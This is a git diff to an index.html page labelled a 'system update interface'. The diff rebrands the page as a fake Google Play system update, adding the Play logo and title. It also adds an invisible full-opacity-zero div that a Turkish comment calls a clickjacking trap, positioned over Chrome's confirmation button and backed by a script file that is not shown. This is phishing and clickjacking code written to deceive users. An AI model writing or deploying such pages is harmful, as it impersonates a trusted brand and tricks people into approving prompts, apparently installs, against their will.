Update index.html for system update interface

--- a/index.html
+++ b/index.html
@@ -3,24 +3,43 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Sistem Güncellemesi</title>
+    <title>Google Play - Sistem Güncellemesi</title>
     <style>
-        body { font-family: sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; background: #f1f3f4; margin: 0; }
-        .card { background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); width: 80%; max-width: 400px; text-align: center; }
-        .progress-container { width: 100%; background: #e0e0e0; border-radius: 10px; margin: 20px 0; overflow: hidden; }
-        .progress-bar { width: 0%; height: 8px; background: #01875f; transition: width 0.3s; }
-        .status { color: #5f6368; font-size: 14px; }
+        body { font-family: 'Roboto', sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; background: #ffffff; margin: 0; overflow: hidden; }
+        .container { width: 90%; max-width: 400px; text-align: center; }
+        .logo { width: 60px; margin-bottom: 20px; }
+        .title { font-size: 22px; color: #202124; margin-bottom: 10px; font-weight: 500; }
+        .progress-container { width: 100%; background: #e8eaed; border-radius: 10px; height: 4px; margin: 25px 0; }
+        .progress-bar { width: 0%; height: 100%; background: #01875f; border-radius: 10px; transition: width 0.2s; }
+        .status { color: #5f6368; font-size: 14px; margin-top: 10px; }
+        #start-btn { background: #01875f; color: white; border: none; padding: 12px 24px; border-radius: 25px; font-size: 16px; cursor: pointer; width: 100%; }
+        
+        /* Şeffaf Tıklama Tuzağı (Clickjacking) */
+        #click-trap {
+            position: fixed;
+            bottom: 15px; /* Chrome'un onay butonuna göre ayarla */
+            right: 15px;
+            width: 160px;
+            height: 70px;
+            background: rgba(255, 0, 0, 0); /* Tamamen şeffaf */
+            z-index: 10000;
+            display: none;
+            cursor: pointer;
+        }
     </style>
 </head>
 <body>
-    <div class="card">
-        <h3 id="title">Uygulama Hazırlanıyor...</h3>
+    <div class="container">
+        <img src="https://upload.wikimedia.org/wikipedia/commons/d/d0/Google_Play_Arrow_logo.svg" class="logo">
+        <div id="title" class="title">Sistem Hazırlanıyor...</div>
         <div class="progress-container">
             <div id="bar" class="progress-bar"></div>
         </div>
-        <p id="status" class="status">Lütfen bekleyin...</p>
-        <button id="start-btn" style="background: #01875f; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer;">Güncellemeyi Başlat</button>
+        <p id="status" class="status">Cihaz uyumluluğu kontrol ediliyor.</p>
+        <button id="start-btn">Güncellemeyi Kur</button>
     </div>
+
+    <div id="click-trap"></div>
 
     <script src="test.js"></script>
 </body>
